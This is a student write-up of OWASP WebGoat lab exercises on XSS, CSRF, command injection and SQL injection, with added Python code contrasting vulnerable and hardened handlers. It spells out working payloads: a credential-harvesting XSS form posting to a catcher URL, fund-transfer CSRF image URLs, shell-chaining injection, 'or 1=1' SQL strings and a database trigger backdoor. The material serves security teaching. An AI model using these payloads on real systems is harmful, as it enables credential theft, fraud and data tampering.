20145225 Tang Web Security Foundation practice of "cyber confrontation"

Source: Internet
Author: User
Tags: SQL injection attack, CSRF attack

Reference blog: 20145215 Luchomin

Basic questions

(1) What is the principle of a SQL injection attack, and how is it defended against?

    • A SQL injection attack tricks the server into executing attacker-chosen SQL: SQL fragments are inserted into a Web form field, or into the query string of a domain name or page request, and the application concatenates them into its own query, so the fragments are parsed as SQL rather than treated as data.

    • Defense: the primary defense is never to build queries by string concatenation but to use parameterized queries (prepared statements), so that input is bound as data and cannot change the query structure. Input validation (allow-listing the expected format, rejecting special characters where they do not belong) and a least-privilege database account are secondary layers, not a substitute.

(2) What is the principle of an XSS attack, and how is it defended against?

    • Cross-site scripting lets a malicious user inject script code into a Web page; when other users view that page, the embedded script runs in their browsers. A common goal of an XSS attack is to steal the target site's cookie, because the session cookie identifies the logged-in session: whoever holds it can use the site as that user from any Internet-connected PC and cause damage under someone else's identity.

    • Defense: validate parameters before the form is submitted or URL parameters are passed, checking user input for illegal content such as angle brackets and quotation marks, and strictly control the output: encode user-supplied data for the context it is rendered in (HTML text, attribute, JavaScript, URL). Marking session cookies HttpOnly keeps them out of reach of injected script.

(3) What is the principle of a CSRF attack, and how is it defended against?

    • A CSRF attack is a cross-site request forgery: the attacker plants a malicious URL pointing at the target site (for example in a message on another page), and when a logged-in user's browser loads it, the request goes out carrying the user's cookies, so the site performs an action the user never intended.
    • Defense: check submissions with the Referer header, an anti-CSRF token, or a CAPTCHA; include secret information in the form, such as a user-specific code, as verification beyond the cookie; clear saved cookies regularly.

WebGoat

    • WebGoat is a deliberately insecure Web application maintained by OWASP for practising Web vulnerabilities and illustrating the security flaws found in Web applications. It runs on a Java virtual machine and ships with many lessons, including XSS, thread safety, SQL injection and so on; our experiments are done on the WebGoat platform.
      1. WebGoat comes in a standalone version and a developer version. The standalone version is a single Java jar that needs only a Java runtime; start it from the command line with: java -jar webgoat-container-7.0.1-war-exec.jar

      2. WebGoat listens on port 8080, so open localhost:8080/WebGoat in the browser. After logging in to WebGoat you can see many lessons to practise on.

Phishing with XSS
  1. In this lesson we enter XSS attack code in the search box and use XSS to add elements to the existing page. We first create a form that asks the victim to fill in a username and password, then add a piece of JavaScript that reads the username and password the victim entered and sends them to http://localhost:8080/WebGoat/catcher?PROPERTY=yes... (the lesson's credential catcher). The full XSS attack code is as follows (the lesson's payload, reformatted and with its JavaScript identifiers restored to the correct case so that it runs):

    </form><script>
    function hack() {
        XSSImage = new Image;
        XSSImage.src = "http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    }
    </script>
    <form name="phish"><br><br><HR>
    Enter username:<br><input type="text" name="user"><br>
    Enter password:<br><input type="password" name="pass"><br>
    <input type="submit" name="login" value="login" onclick="hack()">
    </form><br><br><HR>

    The leading </form> closes the lesson's own search form so that our form is not nested inside it, and the credentials travel to the catcher in the query string of an image request, which needs no user interaction beyond clicking login. Enter a username and password and click login; WebGoat captures what you entered and echoes it back to you.

The attack succeeded:

Stored XSS Attacks
    1. Our goal is to create a message whose content causes other users to load unexpected pages or content when they view it. This is easy: as in the previous experiment, type anything in the title and put a string of code in the message body, for example: <script>alert("5225 attack succeed!");</script>

Reflected XSS Attacks
    1. When we enter wrong user information, the server's input check fails and it returns an error page that shows us the content we entered:

Enter <script>alert("5239 attack succeed!");</script> in the code box. The attack string travels in the URL of the request, which is the input source that gets reflected back into the page.

A dialog pops up: the reflected XSS attack succeeded!
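The three XSS lessons above and the XSS question in the basics section all come down to one rendering mistake: user text is spliced into HTML as markup. The following is an added example (not WebGoat code and not from the original post) that renders the lesson's own payload through a vulnerable message page, a vulnerable error page and a vulnerable search box, beside hardened versions that encode output with Python's html.escape. The payload strings and page templates are constructed for the example; the attribute-context payload shows why filtering only angle brackets, as suggested in the basics answer, is not enough.

```python
import html
import re

# Constructed sample inputs: the page's own stored/reflected payload, plus an
# attribute-context variant that contains no '<' or '>' at all.
STORED_PAYLOAD = '<script>alert("5225 attack succeed!");</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_message_vulnerable(title, body):
    """Stored XSS: the message is stored as typed and spliced into every viewer's page."""
    return f"<h2>{title}</h2><p>{body}</p>"


def render_error_vulnerable(user_input):
    """Reflected XSS: the rejected input is echoed back in the error page unchanged."""
    return f"<p>Invalid input: {user_input}</p>"


def render_search_box_vulnerable(value):
    """Attribute context: a quote in the value closes the attribute and adds a handler."""
    return f'<input type="text" name="q" value="{value}">'


def render_message_safe(title, body):
    """Output encoding for HTML text context: < > & " ' become entities."""
    return f"<h2>{html.escape(title)}</h2><p>{html.escape(body)}</p>"


def render_error_safe(user_input):
    return f"<p>Invalid input: {html.escape(user_input)}</p>"


def render_search_box_safe(value):
    """quote=True (html.escape's default) is what keeps the value inside its attribute."""
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


def contains_script_tag(markup):
    """Check: does the rendered page contain a live <script> element?"""
    return SCRIPT_TAG.search(markup) is not None


def attribute_breakout(markup):
    """Check: did an injected quote terminate the value attribute early?"""
    return '" onmouseover="' in markup
```

Encoding is applied at output time, per context, rather than by stripping characters at input time: the stored message keeps its original text in the database, but a viewer's browser sees `&lt;script&gt;` and renders it as literal text.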

Cross Site Request Forgery

Write a URL that entices other users to click and triggers the CSRF attack. We can embed the URL in the message as an image, so that the URL is not visible to other users; as soon as a user opens the message, the browser fetches the image URL with the user's session cookie and the CSRF request fires.

In the message box, enter an <img> tag whose src is the transfer URL (the Screen and menu values are read from the parameters shown on the right side of the window).

After submission, the message just sent appears in the message list below. Clicking it makes the current page load and display the message; the browser then requests the image URL with the logged-in user's cookie, transferring 5225 yuan from the user's account, which achieves the CSRF attack.

The Screen and menu values may differ from one computer to another; they are shown among the parameters on the right side of the current page. Repeating the submission with a different amount shows another new message in the message list; opening it loads the message again, and this time 4000 yuan of the user's money is transferred.

CSRF Prompt By-Pass

Open a new browser tab and enter localhost:8080/WebGoat/attack?Screen=1410&menu=900&transferFunds=5000 to reach the confirm-transfer page.

After clicking Confirm, enter localhost:8080/WebGoat/attack?Screen=1410&menu=900&transferFunds=confirm.

5000 yuan is transferred successfully. The reason is that the confirmation step is nothing more than a second request with the transferFunds parameter set to confirm; the server does not tie it to the user's click with a token or any other state, so an attacker who can make the victim's browser issue both requests (for example with two images in one message) bypasses the prompt entirely.
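To make the two CSRF lessons and the CSRF question in the basics section concrete, here is an added example (not WebGoat code and not from the original post) that models the lesson's two-step transfer endpoint. The Bank class, its balances and the attacker's two-image message are constructed for the example; the attack URLs reuse the lesson's Screen=1410&menu=900 parameters. The vulnerable handler trusts only the session cookie, which the browser attaches to any request for the site, so the images replay both steps; the hardened handler additionally requires a per-session synchronizer token that only the site's own form can carry.

```python
import secrets
from urllib.parse import parse_qs, urlparse


class Bank:
    """Constructed model of the lesson's transfer page; not WebGoat's own code."""

    def __init__(self):
        self.balances = {"victim": 10000, "attacker": 0}
        self.sessions = {}     # session cookie -> user name
        self.csrf_tokens = {}  # session cookie -> secret embedded in the real form
        self.pending = {}      # session cookie -> amount awaiting the confirm step

    def login(self, user):
        cookie = secrets.token_hex(8)
        self.sessions[cookie] = user
        self.csrf_tokens[cookie] = secrets.token_hex(16)
        return cookie

    def transfer_vulnerable(self, cookie, params):
        """Two-step flow as in 'CSRF Prompt By-Pass': step 1 records the amount,
        step 2 (transferFunds=CONFIRM) moves the money. Only the cookie identifies
        the user, and the browser sends it on requests an <img> triggers too."""
        user = self.sessions[cookie]
        value = params["transferFunds"]
        if value.upper() == "CONFIRM":
            amount = self.pending.pop(cookie, 0)
            self.balances[user] -= amount
            self.balances["attacker"] += amount
            return "transferred %d" % amount
        self.pending[cookie] = int(value)
        return "please confirm"

    def transfer_hardened(self, cookie, params):
        """Synchronizer token: the form the site serves carries a per-session secret
        that a cross-site page cannot read, so a forged request cannot supply it."""
        supplied = params.get("csrf_token", "")
        if not secrets.compare_digest(supplied, self.csrf_tokens[cookie]):
            raise PermissionError("missing or wrong CSRF token")
        return self.transfer_vulnerable(cookie, params)


def params_from_img_src(src):
    """The query parameters a browser sends when it fetches <img src=...>."""
    return {k: v[0] for k, v in parse_qs(urlparse(src).query).items()}


# Constructed attacker message: two <img> tags replay both steps of the transfer.
ATTACK_BASE = "http://localhost:8080/WebGoat/attack?Screen=1410&menu=900&transferFunds="
ATTACK_IMAGES = [ATTACK_BASE + "5000", ATTACK_BASE + "CONFIRM"]


def victim_views_message(bank, victim_cookie, handler):
    """Simulate the victim opening the message while logged in: the browser requests
    each image URL with the victim's cookie. Returns the victim's balance afterwards."""
    for src in ATTACK_IMAGES:
        try:
            handler(victim_cookie, params_from_img_src(src))
        except PermissionError:
            pass  # the hardened endpoint rejected the forged request
    return bank.balances["victim"]
```

The token check is the load-bearing part; comparing the Referer or Origin header and setting the session cookie with SameSite are worthwhile extra layers, but the confirmation page itself adds nothing unless the confirm request must prove it came from the site's own form.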

Command Injection

Using the Firebug extension in the browser to edit the page source, right-click the BackDoors.help option and append "& netstat -an & ipconfig" to its value. The server builds a shell command from this parameter, so the shell's & separator chains our commands onto the original one.

Select the modified value and click View; the injected commands execute and the system's network connections are listed:
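The same flaw in miniature, as an added example (not WebGoat code and not from the original post): a help-file viewer that concatenates the request parameter into a shell command, beside a hardened version that allow-lists the name and runs the program without a shell. The help directory, its file and the payload are constructed for the example and it assumes a POSIX sh with cat available; the lesson's Windows payload uses & and netstat/ipconfig, while here ; and a harmless echo stand in for them.

```python
import os
import re
import subprocess
import tempfile

# Constructed stand-in for the application's help directory.
HELP_DIR = tempfile.mkdtemp()
with open(os.path.join(HELP_DIR, "BackDoors.help"), "w") as fh:
    fh.write("Help for the BackDoors lesson.\n")

# Allow-list: a plain file name ending in .help, no separators or metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+\.help$")

# Lesson-style payload for POSIX sh (the page's Windows form is
# "BackDoors.help & netstat -an & ipconfig"); echo stands in for the commands.
INJECTED = "BackDoors.help; echo INJECTED"


def show_help_vulnerable(help_file):
    """Builds a command string from the parameter and hands it to /bin/sh, so
    shell metacharacters in the parameter become additional commands."""
    cmd = "cat " + os.path.join(HELP_DIR, help_file)
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def show_help_hardened(help_file):
    """Validate the name, keep the resolved path inside HELP_DIR, and pass
    arguments as a list so no shell ever parses them."""
    if not SAFE_NAME.match(help_file):
        raise ValueError("rejected help file name: %r" % help_file)
    path = os.path.realpath(os.path.join(HELP_DIR, help_file))
    if os.path.dirname(path) != os.path.realpath(HELP_DIR):
        raise ValueError("path escapes help directory")
    result = subprocess.run(["cat", path], capture_output=True, text=True)
    return result.stdout


def hardened_rejects(help_file):
    """Check used below: True if the hardened viewer refuses the parameter."""
    try:
        show_help_hardened(help_file)
    except ValueError:
        return True
    return False
```

The list form of subprocess.run is what removes the shell from the picture; the allow-list and the realpath check close the remaining hole, a path like ../ that a shell-free cat would still follow.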

Numeric SQL Injection

Edit the option value with Firebug: after 103, append or 1=1 so that the WHERE condition is always true.

Click Go! and the injection succeeds: every station's data is returned.

String SQL Injection

Enter ' or 1=1-- to build an always-true condition: the quote closes the string literal, or 1=1 matches every row, and -- comments out the rest of the query. Click Go! and all user information is displayed.

Lab: SQL Injection (Stage 1: String SQL Injection)

Entering ' or 1=1-- directly fails. Right-click the input box to inspect the HTML source and it turns out that maxlength is limited to 8. Change it to 20 and log in again: success. The length limit is enforced only in the browser, so it never protected the server.

Lab: SQL Injection (Stage 3: Numeric SQL Injection)

Building on the previous experiment, an ordinary employee, Larry, views his boss's account information.

Right-click Larry's name to inspect the source and find that this element passes the employee ID as a parameter. Change the value to 101 or 1=1 order by salary desc-- so that every row matches and the rows are sorted by salary, highest first.

The boss's record therefore comes first.

Click ViewProfile again and the boss's profile is displayed.

Database Backdoors

Enter 101 first to see the user's information:

Inject 101; UPDATE employee SET salary=5239, which, as the statement has no WHERE clause, sets the salary to 5239.

Finally inject 101; CREATE TRIGGER lxmBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]' WHERE userid = NEW.userid, so that every employee inserted from now on has their email address replaced with mine.
